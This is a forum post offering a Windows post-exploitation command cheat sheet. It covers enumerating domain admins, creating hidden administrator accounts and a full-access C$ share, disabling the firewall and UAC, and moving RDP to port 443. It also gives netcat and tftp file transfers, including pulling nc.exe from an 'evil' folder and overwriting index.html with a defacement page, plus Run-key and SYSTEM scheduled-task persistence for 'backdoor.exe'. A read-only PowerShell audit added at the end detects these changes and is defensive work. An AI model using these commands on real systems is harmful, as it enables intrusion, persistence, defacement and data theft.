Dr-Hack
#1 Posted : Friday, September 27, 2013 6:48:41 PM(UTC)

Rank: Administrator

A list of useful command line syntax which can be used on servers to find various important information

View Computers, Workgroups & Domains:

List Domain Controllers:
    DSQUERY Server

Find Primary DC:
    NETDOM QUERY /D:MyDomain PDC

List FSMO role holders (including the PDC emulator):
    NETDOM QUERY /D:mydomain.com FSMO

Check users logged on:

WMIC /Node:remotecomputer ComputerSystem Get UserName

Using REG.EXE:
Windows 2000|XP|2k3 (batch file syntax, so %% is used; the forum turned the closing ') into an emoticon, restored here):
FOR /F %%A IN ('REG Query \\remotecomputer\HKU ^| FINDSTR /R /B /C:"HKEY_USERS\\S-1-5-[0-9][0-9]-[0-9-]*$"') DO (
    FOR /F "tokens=3 delims=\" %%B IN ('REG Query "\\remotecomputer\%%A\Volatile Environment"') DO (
        SET LoggedinUser=%%B
    )
)

Windows 7:
FOR /F %%A IN ('REG Query \\remotecomputer\HKU /K /F "S-1-5-21-" ^| FINDSTR /R /B /C:"HKEY_USERS\\S-1-5-[0-9][0-9]-[0-9-]*$"') DO (
    FOR /F "tokens=2*" %%B IN ('REG Query "\\remotecomputer\%%~A\Volatile Environment" /V "UserName" ^| FIND /V ":"') DO (
        SET LoggedinUser=%%C
    )
)

net config workstation
    taskkill [/f] /pid <pid>
    taskkill [/f] /im <image_name>

schedule tasks:
echo %time%
    at <time+1min> /INTERACTIVE "cmd.exe"
    pops a SYSTEM level shell if not disabled, scheduled tasks can also be used...

whoami /all
net use
net localgroup
net localgroup <GROUP-NAME>
NET LOCALGROUP Administrators
net localgroup administrators /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Controllers" /domain
net localgroup "Remote Desktop Users"

password policy info:
    net accounts
    net accounts /domain

Find out Group Membership for user:
DSQUERY USER -samid <loginname> | DSGET USER -memberof -expand

Check Directory Permissions for User:
CD /D d:\directory2check
    SHOWACLS /U:Domain\userid

List Drives:
fsutil fsinfo drives

List Shares:
net share

Reset User Pass:
NET USER <loginname> <newpassword> /DOMAIN

on Srv2k3:
DSQUERY USER -samid <loginname> | DSMOD USER -pwd <newpassword>

Now make sure password never expires:
WMIC.EXE /Node:remotecomputer Path Win32_UserAccount Where Name="user" Set PasswordExpires="FALSE"

net user <USER-NAME> <PASS> /add
net localgroup administrators <USER-NAME> /add
net localgroup "Remote Desktop Users" <USER-NAME> /add
net share nothing$=C:\ /grant:<USER-NAME>,FULL /unlimited
    shares the C drive and grants unlimited access to it for our new admin user....

***If the server is a member of a domain, we can go a step further and add a domain level user rather than a local one. This will have more reach within the organisation than a local user will, but it will also be much more visible to the IT team of the organisation that you're testing. Simply add "/DOMAIN" after the first command above to add to domain level in addition to local level

re-enable a disabled account (perhaps an old admin account):
    net user username /active:yes /domain

Tunnel RDP out on another port besides default port 3389, port 443 in this case:
REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f

simply change back to 3389 to return to the default port. If you need to check whether a port is already in use or not you can use a quick "netstat -an | find "<port#>""

**May need a restart or RDP service restart to take effect

Firewall Info:
If you want to find out general info about the firewall, use this:
    netsh firewall show opmode

See list of port openings:
    netsh firewall show portopening

Add port opening in firewall, for port 455 for any service or program to use:
    netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL

Turn off built-in Windows firewall:
    netsh firewall set opmode disable
    SC [ \\Remote_computer ] Stop SharedAccess
    SC [ \\Remote_computer ] Config SharedAccess start= disabled

NetCat File Transfers:
Push a file from client to listener:
ncat -lv [LocalPort] > [outfile]
Listen on [LocalPort], store results in [outfile]
$ nc -w3 [TargetIPaddr] [port] < [infile]
Push [infile] to [TargetIPaddr] on [port]

Pull file from listener back to client:
$ nc -l -p [LocalPort] < [infile]
Listen on [LocalPort], prep to push [infile]
$ nc -w3 [TargetIPaddr] [port] > [outfile]
Connect to [TargetIPaddr] on [port] and retrieve [outfile]

TFTP File Transfers:
If it is not enabled, follow these 4 quick steps:
1 =>    copy %windir%\system32\dllcache\tftpd.exe %windir%\system32
2 =>    sc create tftpdsvc binPath= C:\Windows\System32\tftpd.exe DisplayName= "TFTP Server" start= auto
        Should see: "[SC] CreateService SUCCESS"
3 =>    REG ADD HKLM\SYSTEM\CurrentControlSet\Services\tftpdsvc\Parameters /v Directory /t REG_SZ /d "C:\Documents and Settings\Administrator\Desktop\tftp"
4 =>     net start tftpdsvc

tftp [-i] [Host] [{get | put}] [Source] [Destination]

    -i: Specifies binary image transfer mode (also called octet mode). In binary image mode, the file is transferred in one-byte units. Use this mode when transferring binary files. If -i is omitted, the file is transferred in ASCII mode. This is the default transfer mode. This mode converts the end-of-line (EOL) characters to an appropriate format for the specified computer. Use this mode when transferring text files. If a file transfer is successful, the data transfer rate is displayed.

    Host: Specifies the local or remote computer.

    put: Transfers the file Destination on the local computer to the file Source on the remote computer. Because the TFTP protocol does not support user authentication, the user must be logged onto the remote computer, and the files must be writable on the remote computer.

    get: Transfers the file Destination on the remote computer to the file Source on the local computer.

    Source: Specifies the file to transfer.

    Destination: Specifies where to transfer the file. If Destination is omitted, it is assumed to have the same name as Source.

    /?: Displays help at the command prompt. 

tftp GET /home/hood3drob1n/defaced.html index.html
    This will transfer the local file "defaced.html" from local to remote server and will re-name the file as index.html on the remote server, which was identified as

tftp -i GET /home/hood3drob1n/evil/nc.exe
    This will grab a copy of nc.exe from

tftp -i PUT /home/hood3drob1n/evil/nc.exe /path/on/target/nc.exe
    This will copy local file nc.exe to the server at
If facing newer Windows Systems (Vista, 7, or Srv2008) you might need to disable CTCP protection to get working TFTP as CTCP has been known to cause issues with timeouts (not implemented in Linux or Windows XP)
    To disable enter this command: netsh interface tcp set global congestionprovider=none

TFTP not enabled due to being a newer system? No problem, re-enable it using DISM.
dism (Deployment Image Servicing and Management) allows command line control of Windows features; I do it via a DOS script, but this is the key:
    dism /online /Enable-Feature /FeatureName:TelnetClient
    dism /online /Enable-Feature /FeatureName:TFTP

CMD FTP Remote Download:
echo open <site.com> > ftpscript.txt    (Optional, but if omitted the host/ip needs to be specified after script name in -s argument to identify target host properly)
echo <USER> >> ftpscript.txt
echo <PASS> >> ftpscript.txt
echo binary >> ftpscript.txt    (If next line points to a .exe use this line, otherwise not needed)
echo get <FILE> >> ftpscript.txt
echo quit >> ftpscript.txt
ftp -s:ftpscript.txt

Set Backdoor w/Firewall hole:
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\backdoor.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\backdoor.exe"  /ED 12/12/2012

Services Info:
To delete a Windows Service, simply use the Service Control, or "sc", command with the delete argument followed by the service name:
    sc delete <ServiceName>
        Use quotes if there are spaces in the name:
        sc delete "Apple Mobile Device"

You can use SC to query for all configured services on the box with simple command:
    sc query

All Services on windows can be found under this registry key: 

Start/Pause/Stop/Continue a Service
    SC <ServerName> Start|Pause|Stop|Continue <ServiceName>
        If you omit the server name it assumes localhost, but you can also leverage this to interact with other systems' services if you have elevated privileges
    SC Stop Scheduler
    SC Start Messenger
    SC \\W2k3SRV Pause W3Svc
    SC \\ Continue NTfrs

Disable UAC in Vista+:
%windir%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

Essentially we just set this registry key
        EnableLUA=0 to disable and EnableLUA=1 to re-enable UAC

Query for a specific Value of a Registry Key:

reg <option> [\\TargetIPaddr\][RegDomain]\[Key] /v [ValueName] 

Check if RDP Enabled or not:
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections


To re-enable RDP:
REG.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

If remote registry access is available, you can try tweaking internal machines as well to further pivot:
REG.exe ADD "\\MachineName\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

The machine typically needs to be rebooted for the change to take effect, so open a command prompt and type the following command:

    shutdown -m \\srv220 -r

Interface Device Info:
ipconfig /all
ipconfig /displaydns
arp -a
route print
type %WINDIR%\System32\drivers\etc\hosts

Group Policy Info:
gpresult /z
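From the defender's side, an added read-only PowerShell audit (not part of the original post) that reports the specific settings the commands above change: the RDP port and fDenyTSConnections, EnableLUA, the firewall service state, a hand-registered tftpdsvc, Run-key autostarts and SYSTEM scheduled tasks launched from a user profile. It assumes an English-language Windows (schtasks column names), administrator rights, and PowerShell 5 or later for Get-Service's StartType; it changes nothing.

```powershell
# Added audit script, not from the original post. Reads settings only; reports findings.
function Get-RegValue {
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}
$findings = @()

# RDP moved off 3389 (443 in the post) and/or fDenyTSConnections cleared
$rdpPort = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' 'PortNumber'
if ($rdpPort -and $rdpPort -ne 3389) { $findings += "RDP listens on non-default port $rdpPort" }
$denyTS = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' 'fDenyTSConnections'
if ($denyTS -eq 0) { $findings += 'Remote Desktop is enabled (fDenyTSConnections=0)' }

# UAC switched off with EnableLUA=0
$lua = Get-RegValue 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' 'EnableLUA'
if ($lua -eq 0) { $findings += 'UAC is disabled (EnableLUA=0)' }

# Firewall service stopped or disabled (SharedAccess on XP/2003, MpsSvc on Vista and later)
foreach ($svc in 'SharedAccess', 'MpsSvc') {
    $s = Get-Service -Name $svc -ErrorAction SilentlyContinue
    if ($s -and ($s.Status -ne 'Running' -or $s.StartType -eq 'Disabled')) {
        $findings += "Firewall service $svc is $($s.Status), start type $($s.StartType)"
    }
}

# A hand-registered tftpd service, as in the sc create step above
if (Get-Service -Name 'tftpdsvc' -ErrorAction SilentlyContinue) { $findings += 'Service tftpdsvc exists' }

# Run-key autostarts whose target is outside Program Files or the Windows directory
foreach ($hive in 'HKLM:', 'HKCU:') {
    $props = Get-ItemProperty -Path "$hive\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue
    if (-not $props) { continue }
    foreach ($p in $props.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }   # skip PSPath, PSChildName, etc.
        if ("$($p.Value)" -notmatch '(?i)\\(Program Files|Windows)\\') {
            $findings += "Run entry '$($p.Name)' in $hive -> $($p.Value)"
        }
    }
}

# Scheduled tasks running as SYSTEM from a user profile (the schtasks/at lines above)
schtasks /Query /FO CSV /V | ConvertFrom-Csv | Where-Object {
    $_.'Run As User' -match 'SYSTEM' -and $_.'Task To Run' -match '(?i)\\Users\\|Documents and Settings'
} | ForEach-Object { $findings += "SYSTEM task '$($_.TaskName)' runs $($_.'Task To Run')" }

if ($findings.Count -eq 0) { 'No findings.' } else { $findings }
```

Each finding maps back to one line of the post above, so a clean run means none of those changes are present on the host; a listed finding is a starting point for review, not proof of compromise.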
